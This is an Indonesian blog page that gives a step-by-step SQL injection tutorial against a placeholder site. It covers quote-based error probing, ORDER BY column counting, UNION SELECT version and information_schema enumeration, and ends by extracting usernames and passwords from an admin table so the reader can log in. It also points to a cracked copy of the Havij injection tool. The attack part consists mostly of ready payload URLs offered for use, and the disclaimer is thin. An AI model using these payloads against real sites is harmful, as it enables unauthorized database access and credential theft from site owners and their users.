“You have an error in your SQL syntax.You have an error in your SQL syntax;
check the
manual that corresponds to your MySQL server version for the right syntax to
use near ”’
at line 1″ Dan masih banyak lagi macamnya.
Disini kita akan menggunakan perintah order by
Misalkan errornya disini…
Langsung aja kita liat isinya…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL
injection step by step.
CARITA YAAA :::> CARI DULU BARU TAU....!!!
Categories
- Download Blogger Templats (11)
- INSTALASI (6)
- Koleksi Lirik Lagu (8)
- Macam-macam penyakit dan cara mengatasinya (13)
- Software (7)
- elektronika (6)
- hacker and cracker (14)
- jaringan (11)
- service handphone (15)
- tips-trick (32)
Arsip ke
Munawir Usman. Diberdayakan oleh Blogger.

petak artikel
Harap
dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari
artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan
untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak”
tidak akan ditanggapi.
Cara
ngehacking web atau biasa disebut web attack sangat banyak caranya, salah
satunya dengan cara SQL injection.
Apa itu SQL
injection ?
SQL
injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke
‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah
satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja
cruz3N
oke, mari
kita simak bersama-sama.
1. Pertama
kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini
adalah
http://www.target.com/berita.php?id=100
2. Tambahkan
karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah
ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan
muncul pesan error…
5. Next step
adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi
itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake
“–”. Terserah aja…
Kalo “+”
sebagai penghubung perintah…
6. Nah sampe
sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada
error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada
juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek
dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan
nyerah)
Sampai
muncul error…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang
kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk
mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus
perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya
angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah
mengecek versi berapa mysql yang dipake dengan perintah “version()” atau
“@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo
versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel
dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya
kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi
sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak
lain…ya maklum lah baru belajar…Hehehe…
Misalnya
yang lo liat adalah table “admin”
Nah sekarang
kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya
kolom yang keluar adalah “password” dan “username”
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat
dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
oke selamat
mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website
Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai
software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau
mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
Download HAVIJ
Label :
hacking web • havij cracked • sql injection •
Langganan:
Posting Komentar (Atom)
Popular Posts
-
INSTALASI JARINGAN HOTSPOT Adapun peralatan dan syarat yang harus kita penuhi antara lain: Router/AP Wi-Fi (Referensi hardware...
-
Adakalanya kita sering harus online dan bekerja di sudut-sudut ruangan atau taman, biasanya hal ini dilakukan pada saat is...
-
Teknologi LED LED ( Light Emitting Diode atau Light Emitting Device ) merupakan piranti yang vital dalam teknologi electroluminescent sepe...
-
Bagi mereka yang suka bermain sepak bola, kondisi cuaca buruk bisa menjadi halangan. Jika Anda tidak bisa bermain di lapangan...
-
Berikut ini adalah langkah-langkah perakitan CPU. 1. Letakkan motherboard pada tempat yang datar dan jangan lupa beri alas dengan per...
-
Apakah Anda curiga bahwa seseorang secara sengaja ataupun tidak sengaja menggunakan koneksi jaringan wifi Anda? Mungk...
-
"kali ini jhek kita bljr ttg menyetting sbuah jaringan pd linux ogge perhatkan baek-baek yha...!!! Langkah-langkah Setting IP pada Li...
-
Download Any Video Converter Ultimate 4.4.0 - software yang berfungsi untuk mengkonversi video ke dalam berbagai macam format populer pada...
-
Bagi para pengguna opmin handler trik gratisan gprs, pada provider tertentu sangat sulit untuk men download *jar (mis...